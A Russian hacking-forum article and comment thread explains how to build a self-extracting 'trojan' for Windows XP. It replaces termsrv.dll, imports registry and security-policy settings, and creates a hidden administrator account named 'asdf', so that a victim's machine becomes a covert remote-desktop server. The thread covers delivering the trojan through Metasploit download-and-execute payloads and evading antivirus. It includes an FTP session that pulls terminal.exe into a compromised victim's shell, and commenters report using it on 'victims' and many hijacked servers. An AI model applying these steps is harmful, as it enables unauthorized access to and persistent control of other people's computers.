Превращение Win-xp-sp2 в сервер терминалов (или троян от Мелкомягких)
 

Многие знают, что из WIN-XP можно сделать сервер терминалов и подключаться по сети к удалённому рабочему столу удалённо, работая в отдельной ссесии с графическим интерфейсом, при этом не отключая локального пользователя. То есть в итоге мы получаем возможность входа ещё одного пользователя в систему, только удалённого.

ссылка по теме: http://www.xakep.ru/post/28531/default.asp
В случае прямого доступа к компьютеру это сделать несложно, заменив одну dll (termsrv.dll), настроив политики безопасности, разрешив удалённый рабочий стол и т. д.

Наша задача провернуть всё это удалённо, имея только cmd-шелл.

1. Подготовка

Нам потребуется сама termsrv.dll от старой версии (не помню какой бетты) 5.1.2600.2055 - такая у меня, прямые руки и мозги в голове.
Обратимся к статейке (не помню кто автор, откопаю ссылку-выложу тут, позже):
Итак приступим к сборке трояна от Meлкомягких:
Ну вот, нужная инфа у нас есть. Используем обычный SFX-архив WinRAR, чтоб положить туда три файла:
termsrv.dll - наша dll
key.reg - файл настроек сервера терминалов
run.cmd - сценарий, который сделает всё необходимое.
Определимся с путём куда будет распаковываться наш архив. Я выбрал %WinDir%\Temp (есть у любой винды)
Можно начинать писать файл run.cmd (ему мы передадим управление после распаковки SFX-архива)
Заменить залоченную termsrv.dll, перезаписав её у нас не получится, но мы можем её переименовать!
Так же не забудем про то, что она может быть легко восстановлена службой System File Protection из dll - кэша, поэтому, заменим её и там (она не залочена) а в system32 уже можно скопировать под оригинальным именем.
далее:
Готовим файл key.reg

Берём нашу винду, запускаем regedit и экспортируем реестр. Далее делаем все настройки удалённого рабочего стола.
а) разрешаем его: Свойства системы -> Удалённые сеансы -> Разрешить удалённый доступ к этому компьютеру. (ставим галку)
б) разрешаем быстрое переключение пользователей: Учётные записи пользователей-> Изменение входа пользователей в систему ставим обе галки (использовать страницу приветствия, разрешить быстрое переключение пользователей)
Кстати, надо сделать чтоб наш пользователь не отображался в этом приветствии, так как это сразу палево, поэтому сделаем его скрытым:
- не забудем добавить эту строку в наш key.reg (потом)
Экспортируем реестр ещё раз, затем в TotalCommander сравниваем два файла реестра по содержимому, отслеживаем изменения и заносим их в блокнот.
Сохраняем как файл key.reg
Добавим туда (в начало) ещё то что, прилагалось в статье (настройка сервера терминалов и политики безопасности):
И в конец строку, делающую нашего админа asdf невидимым в окне приглашения.

То что у меня получилось (файл key.reg) , можно скачать тут (имхо его надо всё-таки почистить, много лишнего)

Ну всё готово! Архивируем три файла (termsrv.dll, run.cmd, key.reg) WinRar`ом. Выставляем параметры:
Всё, наш троян готов! (Я обозвал SFX-архив terminal.exe)

3. Впаривание трояна

Используя пакет Metasplot Framework и уязвимости в Windows-XP вы можете попробовать обеспечить его загрузку (впаривание) с удалённого сервера и передачу ему управления. (полезная нагрузка win32_downloadexec)
В общем как вы запустите его на компьютере жерты - это зависит от ваших знаний и везения.
Один из способов описан мной в статье "Metasplot Framework часть 2 (или раздача троя)".

Заключение.

Вот так можно сделать downgrade системы Win-xp-sp2, превратив её в сервер терминалов. Конечно более-менее продвинутый пользователь заметит другого пользователя в системе, убьёт учётку, может сделать откат и т. д. Поэтому в серьёз данного трояна рассматривать не стоит. Кроме того dll ранней версии может быть заменена на новую при установке, добавлении компонентов из дистрибутива и т.д. Но в локалке такая переделка актуальна.
Можно добавить его в автозагрузку - будет даунгрейдится каждый раз при запуске.
Минус в том, что для вступления в силу изменений потребуется перезагрузка системы (можно добавить команду перезагрузки в run.cmd) и только потом будет возможно подключится к удалённому рабочему столу.


P.S.Тут не рассмотренна проблема, которую может создать нестандартный файрвол при подключении к серверу терминалов. (у меня был и стандартный отключен)
Скачать готовый SFX-архив terminal.exe (внутри всё необходимое) Антивирем не палится ;-) (и вряд ли когда будет).

класс! только вот в чем проблемка... я пробывал на себе... в общем появляеться окошко, типо "Вставте диск №2", ну да ладно жму отмену и сохранить файлы. Но после перезагрузки новый пользователь не появляеться. Пробывал на остальных юзверях в общем с SP2 ваще не катит... с SP1 прокатило. И то! двух пользователей одновременно не поддерживает. В общем в чем the problem?

1. Всё справедливо, для Локализованной русской винды, если сидишь под админской учёткой (под ограниченной админа не добавишь). Удалённый сплоит, насколько мне известно получает права "system". Файл сценария run.cmd должен быть набран в 866 кодировке (иначе не найдётся группа "Администраторы" при добавлении нового админа).
2. Проверь termsrv.dll - найди на системном диске все копии библиотеки и глянь версию, может всё-таки оригинальная используется и операция с заменой dll не прошла успешно...
На неделе попробую на трёх системах WIN-XP, SP1, SP2, имхо там есть различие в функционировании службы защиты системных файлов, доведу сборку до ума, чтоб на всех трёх прокатывало...

м... ну я еще не такой опытный... :) в общем благодаря этой статье идейка у меня появилась, сделать что-то подобное с радмином... в общем за ранее спасибо за доработанную сборку:)

было бы странно палить АВ фактически родную длл винды :D

C РАдмином уже сделано (читай мега FAQ Elekt`a по RA). Да и я тоже делал (немного по своему, хотя смысл тот же). Как раз поэтому и захотелось это сделать с сервером терминалов в XP... :)

Вот в чем проблема короче делаю SFX архив
коментарии:
Path=C:\WINDOWS\Help\123\
SavePath
Setup=C:\WINDOWS\Help\123\svchost.exe
Setup=C:\WINDOWS\Help\123\111.bat
Setup=123.exe
Silent=1
Overwrite=2
А антивирус палит, в чем the problem?

onikishov
Не понял, откуда ты взял этот sfx. сам создал и напичкал публичными вирями чтоли? )
Пользоваться надо sfx-сом -=lebed=- (Скачать)
Внимательнее надо читать.
З.Ы.: смотри не запусти случайно его у себя на компе )

Как радмин не назови - будет палится, пробуй его криптовать сначала...

нет, это не вери, а радмин. Так прикол в том, что сначала проверяешь Касперским на вирусы, он светит ниче нема. А у других юзверей орет, что есть(какой антивирус не знаю).

Вместо использования key.reg можно было в run.cmd прописать что то вроде этого:

Лучше бы доработали,оч интересно.У самого мозгов пока что не хватает:(

Чтоб не париться вот патченая длл-ка с моей машины: http://temp.aoh.name/termsrv.dll
Патч: http://temp.aoh.name/TS-Free-1.1.exe

Автор молодец, статья кул +)

А вам слабо сделать такие файлы с обратным действием??????
(на всякий случай :))
Мало ли ты заметил что тебя так протроили...... и ты об этом узнал.!. Конечно же тебе захочется воспользоваться де активом НО ЕГО НЕ СУЩЕСТВУЕТ!!!!!!!!!!!!!!!!!!!

Если работает служба восстановления системы (наблюдение за дисками и реестром), то всегда можно сделать откат системы, на более раннюю дату, кроме того, установка какого-либо компонента виндос, как правило, переписывает termsrv.dll на оригинальную.

Когда конектюсь к компу выводит такую байду

"Интерактивный вход в систему на данном компьютере запрещен локальной политикой."

В чём дело?

1. Смотри в статье это: "Настройка сервера терминалов и политики безопасности".
2. После изменений настроек политики безопасности в реестре требуется перезагрузка системы.

м... А где доработка? уже много времени прошло... В общем возникают проблемы только с SP2. Еще когда на компе включен NOD32 или фаер. netsh firewall add portopening TCP 3389 systerm - эта команда особо не помогает:( Если кто-то продвинулся в этом деле помогите плиз:)

Почему на некоторых дедиках невылазиет окошко чтобы вставить диск ?
Из за этого дедик терминалом нестановится ((
Почему так ?

"было бы странно палить АВ фактически родную длл винды" если включена "Проактивная защита", то спалит =) я про Касперского (kis), а так хз, неплохо )

Да всё бы хорошо :) но как только ты подрубаешься к машине , то у юзера вылетат msgbox , мол asdf пытается установиться связь с этим комп и тд , и если он жмёт "НЕТ " а ведь всё жмут "НЕТ", то облом , а если "ДА" то он тогда вываливается из тачки, начинаются подозрения , жаль что ничего нельзя придумать ... , если есть методы посоветуйте

зы а так всё работает на ура ;)

"Разрешить быстрое переключение пользователей"
- msgbox не должен выскакивать.
- локально работающий юзер не вываливается из своей сессии. Оба должны работать одновременно!

протестил , запустил у жертвы terminal.exe (жертва комп ребутнула ) далее , msgbox вылетает и всё описанное выше :( вот скрины http://slil.ru/25300166

Ты уверен, что замена termsrv.dll прошла успешно и не восстановилась оригинальная версия? Проверь версию либы... Перезагрузку делал?

Так всё проверил :) , значит из 5 компов , 2 пашут нормально , 3 нет , то есть к двум можно подрубиться без проблем жертва ничего не видеть , а на остальных трёх вылетает сообщение (пытается установить сзязь asdf и тд ) хотя точно знаю , что на тех 3 компах , полностью отключенно восстановление системы , отключен бранмауэр , и CD WINDOWS XP PRO не вставлялся (после запуска terminal.exe) и компы были срузу перезагружены и не один раз :D , вот такие дела , самому уже просто интересно , почему это происходит ..... :rolleyes:

Ещё может зависеть от версии винды. У тебя точно все одинаковые? (XP, SP1, SP2 - разница точно есть) а вот если разные билды, то х.е.з. Ну раз на 2 работает - это уже гуд! А ты на тех на которых не получается посмотри параметр "быстрое перекл. пользователей" в системе...

2 -=lebed=- у меня проблема в следующем , когда я получаю эксплоитом LSA "сmd " чужого компа , я не могу залить terminal .exe , то есть на дедике это работает !!!
Ставю себе TYPSoft FTP Server , создаваю свой аккаунт и заливаю
F:\Documents and Settings\sss>ftp
ftp> o
К xx.xxx.xxx.xxx
Связь с xx.xxx.xxx.xxx
220 TYPSoft FTP Server 1.10 ready...
Пользователь (xx.xxx.xxx.xxx:(none)): sss
331 Password required for sss.
Пароль:
230 User sss logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
-rwxrwxrwx 1 ftp ftp 2918400 Dec 20 11:46 fly.exe
-rwxrwxrwx 1 ftp ftp 349696 Dec 23 12:54 sex.exe
-rw-rw-rw- 1 ftp ftp 149001 Dec 23 14:00 terminal.exe
drw-rw-rw- 1 ftp ftp 0 Apr 30 19:00 sss
226 Transfer complete.
ftp: 279 байт получено за 0,00 (сек) со скоростью 279000,00 (КБ/сек).
ftp> Get terminal.exe
200 Port command successful.
150 Opening data connection for terminal.exe.
226 Transfer complete.
ftp: 149001 байт получено за 0,16 (сек) со скоростью 2227,36 (КБ/сек).

начинаю заливать через shell , доходит до

F:\Documents and Settings\sss>ftp
ftp> o
К xx.xxx.xxx.xxx
Связь с xx.xxx.xxx.xxx
220 TYPSoft FTP Server 1.10 ready...
Пользователь (xx.xxx.xxx.xxx:(none)): sss
_

и затем всё зависает наглухо :(((
и так на всех компах к которым получил доступ , все службы вырубил net STOP...
почему это произходит ? будь добр скажи

зы: на хакер часть постов в этом топике почикали (мол ФЛУД) и вообще отношение модеров оставляет желать лучшего http://forum.xakep.ru/m_1033948/mpag...tm.htm#1044503

Оффтоп (неудержался):
Ого, я на ][ легенда уже ... ГЫ!
Мдя...

По сабжу:
1. Если ты "имеешь" систему сплоитом LSA - то это явно не XP SP2, а SP1 или просто XP
2. А если это не SP2 то мой файлик с настройками реестра может и не подойти. Надо попробовать всё сделать самому вручную на SP1, так как возможны ньюансы (я сам на SP1 и ниже не тестил...)
P.S. Жаль потерянного времени на ][...

да ты прав , все тачки XP HOME , но больше интересует вот это факт
вообще не только твой файлик не заливается и другие тоже :(( уже сегодня не только через дедик проверил (через делик заливается ) к другу пришёл подрубился через его cmd к своему ftp и всё залили что было нужно к нему (затем удалил конечно :) пробую через shell , не фига (см выше) :rolleyes:

Не зависает! вводи пароль! в консоли ничего не будет отображаться (даже курсор).

P.S. Попробуй локально через cmd зайти на свой TYPSoft FTP Server 1.10, заходит? Имхо уже пошёл оффтоп..."Особенности работы клиента ftp через удалённый cmd-шелл"

Да вот именно ввожу пароль и всё зависает и весит глухо , локально захожу через cmd на свой TYPSoft без проблем , а через shell жерты ,после ввода пароля всё виснет и весит :confused: сорри за оффтоп

а локально заходит? попробуй другой FTP демон, я пользовался FTP Server by Pablo Software Solutions Version 1.52 - работало...

ЗЫ имхо проблема с установлением соединения по ftp с твоим компом (NAT, фаер...)

Лебедь, будет обновление твоего релиза?
->Вряд-ли, а чем тот не устраивает?

Это типо наезд? :D
Интересно, может Вы куда-то дальше продвинулись.
Вы ж словами просто так не кидаетесь?
руки не дошли до этого в своё время, а щас лень этим заниматься...
Кто? если не ты сам? (с) Elekt

У кого не скрывается пользователь меняем:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]
"asdf"=dword:00000000

на

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]
"asdf"=dword:00000000

блин... мож я че не догнал.... строки веть идентичны оО


а статья отличная просто

Тут soft_all.zip там ещё несколько файлов нужных для работы ;)

Автору зачёт! очень интересная статья

Не то слово интересная , статья высшая , год назад вообще дедики по 38 штук в сутки делал :)

сайт жив, скорее всего проблемы у самого юкоза были...

Да, но потребуется перезагрузка и вероятность что сработает ~33% потому как он собран под конкретную сборку винды, на других может и не прокатить...